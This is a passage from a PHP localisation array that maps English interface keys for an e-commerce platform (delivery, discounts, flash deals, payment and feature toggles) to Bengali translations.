তারিখ', 'estimated_delivery_date' => 'সম্ভাব্য ডেলিভারি তারিখ', 'everything_will_be_rearranged' => 'সবকিছু পুনরায় সাজানো হবে', 'ex' => 'এক্সাম্পল', 'ex = ' => 'এক্সাম্পল=>', 'ex = 123456' => 'এক্সাম্পল=> 123456', 'ex = Alex' => 'এক্সাম্পল=> অ্যালেক্স', 'ex = ex@yahoo.com' => 'এক্সাম্পল=> ex@yahoo.com', 'ex = tls' => 'এক্সাম্পল=> টিএলএস', 'ex = yahoo' => 'এক্সাম্পল=> ইয়াহু', 'ex:' => 'Ex:', 'ex:0.00' => 'এক্সাম্পল: 0.00', 'ex= ' => 'এক্সাম্পল=>', 'ex= 2.1' => 'এক্সাম্পল=> 2.1', 'ex= 49679646444789dsf64f64f6' => 'এক্সাম্পল=> 49679646444789DSF64F64F6', 'ex= 5' => 'এক্সাম্পল=> 5', 'ex= 587' => 'এক্সাম্পল=> 587', 'ex= 70' => 'এক্সাম্পল=> 70', 'ex= dhaka' => 'এক্সাম্পল=> Dhaka াকা', 'ex= f64f6' => 'এক্সাম্পল=> f64f6', 'ex= mail.google.one' => 'এক্সাম্পল=> মেইল.গোগল.ওয়ান', 'ex= salam' => 'এক্সাম্পল=> সালাম', 'ex_:_7+_character' => 'Ex : 7+ character', 'ex_= _7+_character' => 'এক্সাম্পল=> 7+ ক্যারেক্টার', 'ex_= _8+_character' => 'এক্সাম্পল=> 8+ ক্যারেক্টার', 'example@example.com' => 'Example@example.com', 'excel' => 'এক্সেল', 'excellent' => 'দুর্দান্ত', 'exchange_rate' => 'বিনিময় হার', 'exclude' => 'বাদ দিন', 'exclude_with_product' => 'পণ্য দিয়ে বাদ দিন', 'expand_Menu' => 'মেনু প্রসারিত করুন', 'expand_cart' => 'কার্ট প্রসারিত করুন', 'expected_delivery_date' => 'প্রত্যাশিত ডেলিভারি তারিখ', 'expense_Amount' => 'ব্যয়ের পরিমাণ', 'expense_Statistics' => 'ব্যয় পরিসংখ্যান', 'expense_Transaction_Statement' => 'ব্যয় ট্রান্সেকশন স্টেটমেন্ট', 'expense_Transactions' => 'ব্যয় ট্রান্সেকশন', 'expense_Type' => 'ব্যয় প্রকার', 'expense_amount' => 'ব্যয়ের পরিমাণ', 'expense_transaction' => 'ব্যয় ট্রান্সেকশন', 'expense_type' => 'ব্যয় প্রকার', 'expire date' => 'মেয়াদ উত্তীর্ণের তারিখ', 'expire_date' => 'মেয়াদ উত্তীর্ণের তারিখ', 'expired' => 'মেয়াদোত্তীর্ণ', 'expires_on' => 'মেয়াদ শেষ', 'explore_now' => 'এখন এক্সপ্লোর', 'export' => 'এক্সপোর্ট', 'extra' => 'অতিরিক্ত', 'extra_Discount' => 'অতিরিক্ত ছাড়', 'extra_discount' => 'অতিরিক্ত ছাড়', 'extra_discount_added_successfully' => 'অতিরিক্ত ছাড় সফলভাবে যুক্ত হয়েছে', 'extra_on_discount' => 'ছাড়ের অতিরিক্ত', 'facebook' => 'ফেসবুক', 'facebook_API_Set_up_Instructions' => 'ফেসবুক এপিআই নির্দেশাবলী সেট আপ', 'facebook_Login' => 'ফেসবুক লগইন', 'failed' => 'ফেইলড', 'failed To Deliver' => 'পেমেন্ট করতে ব্যর্থ', 'failed to delivery' => 'ডেলিভারি করতে ব্যর্থ', 'failed!Sorry_we_can`t_complete_your_order' => 'ব্যর্থ! দুঃখিত আমরা আপনার অর্ডার শেষ করতে পারি না', 'failed!_Sorry_we_can`t_complete_your_order' => 'ব্যর্থ হয়েছে! দুঃখিত আমরা আপনার অর্ডার শেষ করতে পারি না', 'failed-to-deliver' => 'ডেলিভারি করতে ব্যর্থ', 'failedSorry_we_can`t_complete_your_order' => 'ব্যর্থতা আমরা আপনার অর্ডার সম্পূর্ণ করতে পারি না', 'failed_!_Sorry_we_can`t_complete_your_order' => 'ব্যর্থ ! দুঃখিত আমরা আপনার অর্ডার শেষ করতে পারি না', 'failed_To_Delivery' => 'ডেলিভারি করতে ব্যর্থ', 'failed_to_Deliver' => 'পেমেন্ট করতে ব্যর্থ', 'failed_to_add_deliveryman_charge' => 'ডেলিভারি চার্জ যুক্ত করতে ব্যর্থ', 'failed_to_deliver' => 'ডেলিভারি করতে ব্যর্থ', 'failed_to_delivery' => 'ডেলিভারি করতে ব্যর্থ', 'false' => 'মিথ্যা', 'faq' => 'FAQ', 'fast_delivery_all_accross_the_country' => 'দ্রুত ডেলিভারি সমস্ত দেশকে আদায় করে', 'faster_&_secure_way_to_pay_bill' => 'বিল পরিশোধের দ্রুত এন্ড সুরক্ষিত উপায়', 'fawry_pay' => 'Fawry pay', 'feature deals' => 'ফীচার ডিল', 'feature_deal' => 'ফীচার ডিল', 'featured' => 'ফীচার', 'featured deal' => 'ফীচার ডিল', 'featured_Deal' => 'ফীচার ডিল', 'featured_Product_From_This_Store' => 'এই স্টোর থেকে ফীচার পণ্য', 'featured_Products' => 'ফীচার পণ্য', 'featured_deal' => 'ফীচার ডিল', 'featured_product' => 'ফীচার পণ্য', 'featured_product_for_this_season' => 'এই মরসুমের জন্য ফীচার পণ্য', 'featured_product_from_this_store' => 'এই স্টোর থেকে ফীচার পণ্য', 'featured_products' => 'ফীচার পণ্য', 'featured_status_updated_successfully' => 'ফীচার স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'features_Section' => 'ফীচার ক্যাটাগরি', 'feel_free_to_email_us' => 'আমাদের ইমেল নির্দ্বিধায়', 'few_steps_ahead' => 'কয়েক ধাপ এগিয়ে', 'field_name' => 'ক্ষেত্র নাম', 'file' => 'ফাইল', 'file_delete_successfully' => 'ফাইল সফলভাবে মুছবেন', 'file_manager' => 'নথি ব্যবস্থাপক', 'file_not_found' => 'ফাইল পাওয়া যায় নি', 'file_path_copied_successfully!' => 'ফাইল পাথ সফলভাবে অনুলিপি!', 'file_size_too_big' => 'ফাইলের আকার খুব বড়', 'file_type' => 'ফাইলের ধরন', 'file_upload_successfully!' => 'সাফল্যের সাথে ফাইল আপলোড করুন!', 'fill_in_your_email_address_below.' => 'নীচে আপনার ইমেল ঠিকানা পূরণ করুন।', 'fill_the_form_and_press' => 'ফর্মটি পূরণ করুন এন্ড প্রেস', 'filter' => 'ফিল্টার', 'filter Data' => 'ফিল্টার ডেটা', 'filter_Data' => 'ফিল্টার ডেটা', 'filter_by' => 'দ্বারা ফিল্টার করুন', 'filter_data' => 'ফিল্টার ডেটা', 'filter_options' => 'ফিল্টার বিকল্প', 'filter_order' => 'ফিল্টার অর্ডার', 'find_SMTP_server_details' => 'এসএমটিপি সার্ভারের ডিটেলসটি সন্ধান করুন', 'find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'তাদের মধ্যে পার্থক্য এন্ড মিল দেখতে পণ্যগুলি সন্ধান করুন এন্ড নির্বাচন করুন', 'find_us' => 'আমাদের খুঁজুন', 'find_your_best_featured_product' => 'আপনার সেরা ফীচার পণ্য সন্ধান করুন', 'find_your_best_signature_product' => 'আপনার সেরা সিগন্যাট্রার পণ্য সন্ধান করুন', 'first' => 'প্রথম', 'first order' => 'প্রথম অর্ডার', 'first_Name' => 'নামের প্রথম অংশ', 'first_Order' => 'প্রথম অর্ডার', 'first_name' => 'নামের প্রথম অংশ', 'first_name_is_required' => 'প্রথম নাম প্রয়োজন', 'first_step' => 'প্রথম ধাপ', 'fixed' => 'স্থির', 'fixed_amount' => 'নির্দিষ্ট পরিমাণ', 'flash deal' => 'ফ্ল্যাশ ডিল', 'flash deal products' => 'ফ্ল্যাশ ডিল পণ্য', 'flash deals' => 'ফ্ল্যাশ ডিল', 'flash_Deal' => 'ফ্ল্যাশ ডিল', 'flash_Deal_Products' => 'ফ্ল্যাশ ডিল পণ্য', 'flash_Deals' => 'ফ্ল্যাশ ডিল', 'flash_deal' => 'ফ্ল্যাশ ডিল', 'flash_deal_' => 'ফ্ল্যাশ ডিল', 'flash_deal_table' => 'ফ্ল্যাশ ডিল টেবিল', 'flash_deals' => 'ফ্ল্যাশ ডিল', 'flash_deals_update' => 'ফ্ল্যাশ ডিল আপডেট', 'flat' => 'সমান', 'flutterwave' => 'ফ্লাটারওয়েভ', 'follow' => 'অনুসরণ করুন', 'follow_steps' => 'পদক্ষেপ অনুসরণ করুন', 'follow_successfully' => 'সফলভাবে অনুসরণ করুন', 'followers' => 'অনুগামী', 'footer_Banner' => 'ফুটার ব্যানার', 'for' => 'জন্য', 'for_android' => 'অ্যান্ড্রয়েডের জন্য', 'for_app' => 'অ্যাপ্লিকেশন জন্য', 'for_data_entry' => 'ডেটা এন্ট্রি জন্য', 'for_inhouse_deliver' => 'ইনহাউস সরবরাহের জন্য', 'for_ios' => 'আইওএসের জন্য', 'for_website' => 'ওয়েবসাইটের জন্য', 'for_you' => 'আপনার জন্য', 'for_Ready_Product_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_Ready_After_Sale_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'রেডি প্রোডাক্ট ডেলিভারি গ্রাহকরা অর্থ পেমেন্ট করতে এন্ড তাত্ক্ষণিকভাবে প্রাক-আপলোড করা ডিজিটাল পণ্যগুলি ডাউনলোড করতে পারেন। বিক্রির পরে প্রস্তুত গ্রাহকরা প্রথমে অর্থ পেমেন্ট করেন তারপরে অ্যাডমিন ডাউনলোডের জন্য গ্রাহকদের জন্য এভেইল্যাবলে ডিজিটাল পণ্যগুলি আপলোড করে', 'for_Ready_Product_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_admin._For_Ready_After_Sale_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => ' রেডি প্রোডাক্ট ডেলিভারি গ্রাহকরা অ্যাডমিন দ্বারা প্রাক-আপলোড করা ডিজিটাল পণ্যগুলি পেমেন্ট করতে এন্ড তাত্ক্ষণিকভাবে ডাউনলোড করতে পারেন। বিক্রির পরে প্রস্তুত প্রস্তুত গ্রাহকরা প্রথমে অর্থ পেমেন্ট করেন তারপরে অ্যাডমিন ডাউনলোডের জন্য গ্রাহকদের জন্য এভেইল্যাবলে ডিজিটাল পণ্যগুলি আপলোড করে', 'for_Ready_Product_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_seller._For_Ready_After_Sale_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => ' রেডি প্রোডাক্ট ডেলিভারি গ্রাহকরা বিক্রেতার দ্বারা প্রাক-আপলোড করা ডিজিটাল পণ্যগুলি তাত্ক্ষণিকভাবে ডাউনলোড করতে এন্ড তাত্ক্ষণিকভাবে ডাউনলোড করতে পারেন। বিক্রির পরে গ্রাহকরা প্রথমে অর্থ পেমেন্ট করে প্রস্তুত', 'forgot_Password' => 'পাসওয়ার্ড ভুলে গেছেন', 'forgot_password' => 'পাসওয়ার্ড ভুলে গেছেন', 'forgot_password ' => 'পাসওয়ার্ড ভুলে গেছেন', 'forgot_password_verification_by' => 'দ্বারা পাসওয়ার্ড ভেরিফিকেশন ভুলে গেছেন', 'forgot_your_password' => 'আপনি কি পাসওয়ার্ড ভুলে গেছেন', 'form' => 'ফর্ম', 'form & press' => 'ফর্ম এন্ড প্রেস', 'format_within' => 'মধ্যে ফর্ম্যাট', 'fourth_step' => 'চতুর্থ পদক্ষেপ', 'free' => 'বিনামূল্যে', 'free delivery' => 'বিনামূল্যে ডেলিভারি', 'free_Delivery' => 'বিনামূল্যে ডেলিভারি', 'free_Delivery_Amount' => 'বিনামূল্যে ডেলিভারি পরিমাণ', 'free_Delivery_Coupon' => 'বিনামূল্যে ডেলিভারি কুপন', 'free_Delivery_Over' => 'বিনামূল্যে ডেলিভারি', 'free_Delivery_Over_Amount' => 'পরিমাণের ওপরে বিনামূল্যে ডেলিভারি', 'free_Delivery_Responsibility' => 'বিনামূল্যে ডেলিভারি দায়িত্ব', 'free_Shipping_Over_Order_Amount_Discount' => 'অর্ডার পরিমাণ ছাড়ের উপর বিনামূল্যে শিপিং', 'free_delivery' => 'বিনামূল্যে ডেলিভারি', 'free_delivery_amount' => 'বিনামূল্যে ডেলিভারি পরিমাণ', 'free_delivery_coupon' => 'বিনামূল্যে ডেলিভারি কুপন', 'free_delivery_on_coupon_discount' => 'কুপন ছাড়ের উপর বিনামূল্যে ডেলিভারি', 'free_delivery_over_amount' => 'পরিমাণের ওপরে বিনামূল্যে ডেলিভারি', 'free_delivery_over_amount_for_every_seller_if_they_do_not_set_any_range_yet' => 'প্রতিটি বিক্রেতার জন্য বিনামূল্যে ডেলিভারি যদি তারা এখনও কোনও পরিসীমা সেট না করে', 'frequently_asked_question' => 'সচরাচর জিজ্ঞাস্য', 'from' => 'থেকে', 'from Navbar' => 'নেভবার থেকে', 'from admin' => 'অ্যাডমিন থেকে', 'from below and click' => 'নীচে থেকে এন্ড ক্লিক করুন', 'from left sidebar' => 'বাম সাইডবার থেকে', 'from_Navbar' => 'নাভবার থেকে', 'from_Register_tab_press' => 'রেজিস্টার ট্যাব প্রেস থেকে', 'from_below_and_click' => 'নীচে থেকে এন্ড ক্লিক করুন', 'from_date' => 'তারিখ হইতে', 'from_left_sidebar' => 'বাম সাইডবার থেকে', 'full_Name' => 'Full Name', 'full_name' => 'পুরো নাম', 'fund_add_by_admin+message' => 'অ্যাডমিন+মেসেজ দ্বারা ফান্ড যুক্ত করুন', 'fund_added_successfully' => 'ফান্ড সফলভাবে যুক্ত হয়েছে', 'fwrf' => 'গুঞ্জন', 'gallery' => 'গ্যালারী', 'gateway' => 'পেমেন্টপথ', 'general' => 'সাধারণ', 'general_Info' => 'সাধারণ তথ্য', 'general_Information' => 'সাধারণ জ্ঞাতব্য', 'general_info' => 'সাধারণ তথ্য', 'general_information' => 'সাধারণ জ্ঞাতব্য', 'general_settings' => 'সাধারণ সেটিংস', 'general_setup' => 'সাধারণ সেটআপ', 'generate' => 'জেনারেট', 'generate_Code' => 'কোড জেনারেট করুন', 'generate_barcode' => 'বারকোড জেনারেট করুন', 'generate_code' => 'কোড জেনারেট করুন', 'generate_invoice' => 'প্রিন্ট জেনারেট করুন', 'generate_sitemap' => 'সাইটম্যাপ জেনারেট করুন', 'genuine' => 'অকৃত্রিম', 'genuine_product' => 'খাঁটি পণ্য', 'get_In' => 'ভিতরে আস', 'get_in' => 'ভিতরে আস', 'get_new_password' => 'নতুন পাসওয়ার্ড পেতে', 'get_started' => 'এবার শুরু করা যাক', 'get_your_zip_file_from_the_purchased_addons_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'কেনা অ্যাডনগুলি থেকে আপনার জিপ ফাইলটি পান এন্ড এটি আপলোড করুন এন্ড আপনার কোডক্যানিয়ন ব্যবহারকারীর নাম এন্ড ক্রয় কোড সহ থিমটি সক্রিয় করুন', 'get_your_zip_file_from_the_purchased_theme_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'কেনা থিম থেকে আপনার জিপ ফাইলটি পান এন্ড এটি আপলোড করুন এন্ড আপনার কোডক্যানিয়ন ব্যবহারকারীর নাম এন্ড ক্রয় কোড সহ থিমটি সক্রিয় করুন', 'go_to' => 'যান', 'go_to_Vacation_Mode' => 'ভ্যাকেশন মোডে যান', 'go_to_apple_developer_page' => 'অ্যাপল বিকাশকারী পৃষ্ঠায় যান', 'go_to_chatbox' => 'চ্যাটবক্সে যান', 'go_to_checkout' => 'চেকআউট যেতে', 'go_to_shopping' => 'কেনাকাটা করতে যান', 'go_to_the_SMTP_mail_setup_page_in_the_admin_panel' => 'অ্যাডমিন প্যানেলে এসএমটিপি মেল সেটআপ পৃষ্ঠায় যান', 'go_to_the_facebook_developer_page' => 'ফেসবুক বিকাশকারী পৃষ্ঠায় যান', 'go_to_vacation_mode' => 'ভ্যাকেশন মোডে যান', 'gogoi' => 'গোগোই', 'good' => 'ভাল', 'google' => 'গুগল', 'google-plus' => 'Google-plus', 'google_API_Set_up_Instructions' => 'গুগল এপিআই নির্দেশাবলী সেট আপ করুন', 'google_credentials_updated' => 'গুগল ক্রেডেনটিয়াল আপডেট হয়েছে', 'google_map_API_setup' => 'গুগল মানচিত্র এপিআই সেটআপ', 'google_play_store' => 'গুগল প্লে স্টোর', 'google_plus' => 'গুগল প্লাস', 'google_tag_manager_id' => 'গুগল ট্যাগ ম্যানেজার আইডি', 'google_tag_manager_script_id_from_google' => 'গুগল থেকে গুগল ট্যাগ ম্যানেজার স্ক্রিপ্ট আইডি', 'got_it' => 'বুজেছি', 'guest_checkout' => 'অতিথি পাস', 'guest_customer' => 'অতিথি গ্রাহক', 'halar' => 'Halar', 'has_been_sent_to_' => 'পাঠানো হয়েছে', 'hash' => 'হ্যাশ', 'have_an_account' => 'একাউন্ট আছে', 'have_to_upload_zip_file' => 'জিপ ফাইল আপলোড করতে হবে', 'header_Banner' => 'শিরোনাম ব্যানার', 'hello' => 'হ্যালো', 'help topics' => 'বিষয়গুলি সহায়তা করুন', 'help_&_support' => 'সাহায্য সহযোগীতা', 'help_&_support_section' => 'সহায়তা ও সাপোর্ট ক্যাটাগরি', 'help_topic' => 'সাহায্যের বিষয়', 'help_topic_Table' => 'হেল্প টপিক টেবিল', 'here' => 'এখানে', 'here_in_top__left_corner_you_can_see_the' => 'এখানে শীর্ষ বাম কোণে আপনি দেখতে পারেন', 'hi' => 'ওহে', 'high' => 'উচ্চ', 'high_low' => 'উচু নিচু', 'high_to_low_price' => 'উচ্চ থেকে কম দাম', 'highest_Products' => 'সর্বোচ্চ পণ্য', 'hight_low' => 'হাইট কম', 'hold' => 'হোল্ড', 'holder_Name' => 'ধারক নাম', 'holder_name' => 'ধারক নাম', 'home' => 'হোম', 'home_category_status' => 'হোম ক্যাটাগরি স্ট্যাটাস', 'home_status' => 'হোম স্ট্যাটাস', 'host' => 'হোস্ট', 'hotline' => 'হটলাইন', 'hours' => 'ঘন্টার', 'how_it_works' => 'কিভাবে এটা কাজ করে', 'how_much_point' => 'কত পয়েন্ট', 'how_to_use' => 'কিভাবে ব্যবহার করে', 'how_you_it_works' => 'আপনি কিভাবে এটি কাজ করে', 'hrs' => 'ঘন্টা', 'i_Accept' => 'আমি স্বীকার করছি', 'i_agree_to_Your' => 'আমি আপনার সাথে সম্মত', 'i_agree_to_Your_terms' => 'আমি আপনার শর্তাবলী সম্মত', 'i_agree_with_the' => 'আমি তার সাথে একমত', 'icon' => 'আইকন', 'icon_box' => 'আইকন বক্স', 'id' => 'আইডি', 'identification_number' => 'সনাক্তকরণ নম্বর', 'identify_number' => 'সনাক্তকরণ নম্বর', 'identify_type' => 'সনাক্তকরণ নম্বর টাইপ', 'identity' => 'পরিচয়', 'identity_Number' => 'পরিচয় সংখ্যা', 'identity_Type' => 'পরিচয়ের ধরণ', 'identity_image' => 'পরিচয় চিত্র', 'if the shipping responsibility is inhouse and product wise shipping is activated then this function will work' => 'যদি শিপিংয়ের দায়িত্ব ইনহাউস এন্ড পণ্য অনুসারে শিপিং সক্রিয় হয় তবে এই ফাংশনটি কার্যকর হবে', 'if_Customer_Referral_Earning_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'গ্রাহক রেফারেল উপার্জন যদি এই ক্যাটাগরি সমস্ত সেটিংসের উপরে ডিস্যাবল থাকে তবে তা আনএভেইল্যাবল থাকবে', 'if_GST_number_is_disabled_here_it_will_not_show_in_invoice' => 'যদি জিএসটি নম্বর এখানে ডিস্যাবল থাকে তবে এটি প্রিন্টে প্রদর্শিত হবে না', 'if_disabled _this_SMS_service_will_be_hidden_from_the_system ' => 'যদি ডিস্যাবল করা হয় তবে এই এসএমএস পরিষেবাটি সিস্টেম থেকে হাইড হবে', 'if_disabled_Admin_needs_to_return_the_refund_amount_manually' => 'যদি ডিস্যাবল অ্যাডমিনকে ম্যানুয়ালি রিফান্ডের পরিমাণ রিফান্ড দিতে হয়', 'if_disabled_Digital_Payment_options_will_be_hidden_from_the_checkout_page' => 'যদি ডিস্যাবল ডিজিটাল অর্থ পেমেন্ট বিকল্পগুলি চেকআউট পৃষ্ঠা থেকে হাইড থাকবে', 'if_disabled_POS_option_will_be_hidden_from_the_Seller_Panel' => 'যদি ডিস্যাবল POS অপসনটি বিক্রেতা প্যানেল থেকে হাইড হবে', 'if_disabled_Sellers_can_not_register_themselves_from_website_or_App' => 'যদি ডিস্যাবল বিক্রেতারা ওয়েবসাইট বা অ্যাপ্লিকেশন থেকে নিজেকে নিবন্ধিত করতে না পারে', 'if_disabled_all_your_apps_and_customer_website_will_be_functional' => 'যদি ডিস্যাবল করা হয় তবে আপনার সমস্ত অ্যাপ্লিকেশন এন্ড গ্রাহক ওয়েবসাইট কার্যকর হবে', 'if_disabled_brand_section_will_be_hidden_from_the_customer_app_and_website' => 'যদি ডিস্যাবল হয় ব্র্যান্ড ক্যাটাগরিটি গ্রাহক অ্যাপ্লিকেশন এন্ড ওয়েবসাইট থেকে হাইড হবে', 'if_disabled_customer_wallet_option_will_be_hidden_from_their_account' => 'যদি ডিস্যাবল গ্রাহক ওয়ালেট অপসনটি তাদের অ্যাকাউন্ট থেকে হাইড হবে', 'if_disabled_customers_can_only_pay_through_the_system_supported_payment_methods' => 'যদি ডিস্যাবল গ্রাহকরা কেবল সিস্টেম সমর্থিত অর্থ পেমেন্ট পদ্ধতির মাধ্যমে অর্থ পেমেন্ট করতে পারেন', 'if_disabled_customers_have_to_use_the_system-added_payment_gateways' => 'যদি ডিস্যাবল গ্রাহকদের সিস্টেম-যুক্ত পেমেন্ট গেটওয়ে ব্যবহার করতে হয়', 'if_disabled_customers_will_not_receive_rewards_for_successful_referral' => 'যদি ডিস্যাবল গ্রাহকরা সফল রেফারেলের জন্য পুরষ্কার পাবেন না', 'if_disabled_customers_would_not_be_able_to_add_money_to_their_wallet' => 'যদি ডিস্যাবল গ্রাহকরা তাদের ওয়ালেট অর্থ যোগ করতে এনাবল না হন', 'if_disabled_deliverymen_do_not_need_to_verify_the_order_deliveries' => 'যদি ডিস্যাবল ডেলিভারিম্যানদের অর্ডার ডেলিভারিস যাচাই করার প্রয়োজন হয় না', 'if_disabled_loyalty_point_option_will_be_hidden_from_the_customers_account' => 'যদি ডিস্যাবল লয়াল্টি পয়েন্ট অপসনটি গ্রাহকদের অ্যাকাউন্ট থেকে হাইড হবে', 'if_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'যদি ডিস্যাবল হয় বিক্রেতারা তাদের দোকানে ডিজিটাল পণ্য বিক্রি করতে না পারে', 'if_disabled_sellers_cannot_set_the_minimum_order_amount_for_their_store_and_the_admin_will_set_it' => 'যদি ডিস্যাবল বিক্রেতারা তাদের স্টোরের জন্য সর্বনিম্ন অর্ডার পরিমাণ নির্ধারণ করতে না পারে এন্ড অ্যাডমিন এটি সেট করবে', 'if_disabled_system_cannot_use_this_SMS_Gateway' => 'যদি ডিস্যাবল হয় সিস্টেম এই এসএমএস গেটওয়ে ব্যবহার করতে না পারে', 'if_disabled_the Cash_on_Delivery_payment_method_will_be_hidden_from_the_checkout_page' => 'যদি ডিস্যাবল করা হয় তবে ক্যাশ অন ডেলিভারি পেমেন্ট পদ্ধতি চেকআউট পৃষ্ঠা থেকে হাইড হবে', 'if_disabled_the_App_Store_button_will_be_hidden_from_the_website_footer' => 'ডিস্যাবল থাকলে অ্যাপ স্টোর বোতামটি ওয়েবসাইটের ফুটার থেকে হাইড থাকবে', 'if_disabled_the_Google_Play_Store_button_will_be_hidden_from_the_website_footer' => 'যদি ডিস্যাবল করা হয় তবে গুগল প্লে স্টোর বোতামটি ওয়েবসাইট ফুটার থেকে হাইড থাকবে', 'if_disabled_the_billing_address_will_be_hidden_from_the_checkout_page' => 'যদি ডিস্যাবল করা হয় তবে বিলিং ঠিকানা চেকআউট পৃষ্ঠা থেকে হাইড হবে', 'if_disabled_the_free_delivery_feature_will_be_hidden_from_the_system' => 'যদি ডিস্যাবল করা হয় তবে বিনামূল্যে ডেলিভারি ফীচারটি সিস্টেম থেকে হাইড হবে', 'if_disabled_there_will_be_no_delivery_restrictions_based_on_zip_code_areas' => 'যদি ডিস্যাবল করা হয় তবে জিপ কোড অঞ্চলের উপর ভিত্তি করে কোনও ডেলিভারি নিষেধাজ্ঞা থাকবে না', 'if_disabled_there_will_be_no_minimum_order_restrictions_and_customers_can_place_any_order_amount' => 'ডিস্যাবল থাকলে কোনও ন্যূনতম অর্ডার সীমাবদ্ধতা থাকবে না এন্ড গ্রাহকরা কোনও অর্ডার পরিমাণ রাখতে পারবেন', 'if_disabled_this_banner_will_be_hidden_from_the_website_and_customer_app' => 'যদি ডিস্যাবল করা হয় তবে এই ব্যানারটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপ্লিকেশন থেকে হাইড হবে', 'if_disabled_this_coupon_will_be_hidden_from_the_website_and_customer_app' => 'ডিস্যাবল হলে এই কুপনটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপ্লিকেশন থেকে হাইড হবে', 'if_disabled_this_customer_will_be_blocked_and_cannot_log_in_to_this_system' => 'যদি ডিস্যাবল হয় এই গ্রাহক হবে অবরুদ্ধ হবে এবং এই সিস্টেমে লগ ইন করতে পারবে না', 'if_disabled_this_deliveryman_cannot_log_in_to_the_system_and_deliver_any_products' => 'If disabled this deliveryman cannot log in to the system and deliver any products', 'if_disabled_this_employee_can_not_log_in_to_the_system_and_perform_his_role' => 'যদি ডিস্যাবল হয় এই কর্মচারী এ সিস্টেম এবং তার ভুমিকায় লগইন করতে পারবে না', 'if_disabled_this_feature_will_be_hidden_from_the_system' => 'যদি ডিস্যাবল করা হয় তবে এই ফীচারটি সিস্টেম থেকে হাইড হবে', 'if_disabled_this_language_will_be_hidden_from_the_entire_system' => 'ডিস্যাবল হলে এই ভাষাটি পুরো সিস্টেম থেকে হাইড হবে', 'if_disabled_this_language_will_be_unset_as_default_for_the_entire_system' => 'যদি ডিস্যাবল করা হয় তবে এই ভাষাটি পুরো সিস্টেমের জন্য ডিফল্ট একাউন্টে আনসেট হবে', 'if_disabled_this_payment_method_will_be_hidden_from_the_checkout_page' => 'যদি ডিস্যাবল করা হয় তবে এই অর্থ পেমেন্ট পদ্ধতিটি চেকআউট পৃষ্ঠা থেকে হাইড হবে', 'if_disabled_this_product_will_be_hidden_from_the_website_and_customer_app' => 'ডিস্যাবল হলে এই পণ্যটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপ্লিকেশন থেকে হাইড হবে', 'if_disabled_this_product_will_be_removed_from_the_featured_product_section_of_the_website_and_customer_app' => 'যদি ডিস্যাবল করা হয় তবে এই পণ্যটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপের ফীচার পণ্য ক্যাটাগরি থেকে সরানো হবে', 'if_disabled_this_support_ticket_will_be_inactive' => 'ডিস্যাবল হলে এই সাপোর্ট টিকিট নিষ্ক্রিয় হবে', 'if_disabled_users_must_log_in_to_the_system_to_complete_the_checkout_process' => 'যদি ডিস্যাবল ব্যবহারকারীদের অবশ্যই চেকআউট প্রক্রিয়াটি সম্পূর্ণ করতে সিস্টেমে লগ ইন করতে হবে', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_email_addresses' => 'যদি ডিস্যাবল ব্যবহারকারীরা তাদের নিবন্ধিত ইমেল ঠিকানাগুলিতে ভেরিফিকেশন কোডগুলি না পান', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_phone_numbers' => 'যদি ডিস্যাবল ব্যবহারকারীরা তাদের নিবন্ধিত ফোন নম্বরগুলিতে ভেরিফিকেশন কোডগুলি না পান', 'if_enabled _customers_can_choose_digital_payment_options_during_the_checkout_process' => 'এনাবল যদি গ্রাহকরা চেকআউট প্রক্রিয়া চলাকালীন ডিজিটাল অর্থ পেমেন্ট বিকল্পগুলি পছন্দ করতে পারেন', 'if_enabled _the_cash_on_delivery_option_will_be_available_on_the_system._Customers_can_use_COD_as_a_payment_option' => 'এনাবল হলে ক্যাশ অন ডেলিভারি অপসনটি সিস্টেমে এভেইল্যাবলে হবে। গ্রাহকরা পেমেন্ট বিকল্প একাউন্টে সিওডি ব্যবহার করতে পারেন', 'if_enabled _the_shipping_charge_will_increase_with_the_product_quantity' => 'এনাবল হলে শিপিং চার্জটি পণ্যের পরিমাণের সাথে বাড়বে', 'if_enabled _this_SMS_service_will_be_available_in_the_system' => 'এনাবল হলে এই এসএমএস পরিষেবাটি সিস্টেমে এভেইল্যাবলে হবে', 'if_enabled_Admin_can_return_the_refund_amount_directly_to_the_customers_wallet_' => 'যদি এনাবল অ্যাডমিন গ্রাহকদের ওয়ালেটে সরাসরি রিফান্ডের পরিমাণ রিফান্ড দিতে পারে', 'if_enabled_POS_option_will_be_available_in_the_Seller_Panel' => 'এনাবল যদি POS অপসনটি বিক্রেতা প্যানেলে পাওয়া যায়', 'if_enabled_POS_will_be_available_on_the_Seller_Panel' => 'এনাবল যদি POS বিক্রেতা প্যানেলে পাওয়া যায়', 'if_enabled_admin_can_deliver_orders_outside_his_country' => 'যদি এনাবল হয় অ্যাডমিন তার দেশের বাইরে অর্ডার সরবরাহ করতে পারে', 'if_enabled_admin_can_temporarily_pause_his_shop_activities' => 'এনাবল যদি অ্যাডমিন অস্থায়ীভাবে তার দোকানের ক্রিয়াকলাপগুলি বিরতি দিতে পারে', 'if_enabled_all_your_apps_and_customer_website_will_be_temporarily_off' => 'যদি আপনার সমস্ত অ্যাপ্লিকেশন এন্ড গ্রাহক ওয়েবসাইট অস্থায়ীভাবে বন্ধ হয়ে যাবে', 'if_enabled_customers_can_add_money_to_their_wallet' => 'এনাবল যদি গ্রাহকরা তাদের ওয়ালেট অর্থ যোগ করতে পারেন', 'if_enabled_customers_can_have_the_wallet_option_on_their_account_and_use_it_while_placing_orders_and_getting_refunds' => 'যদি এনাবল গ্রাহকরা 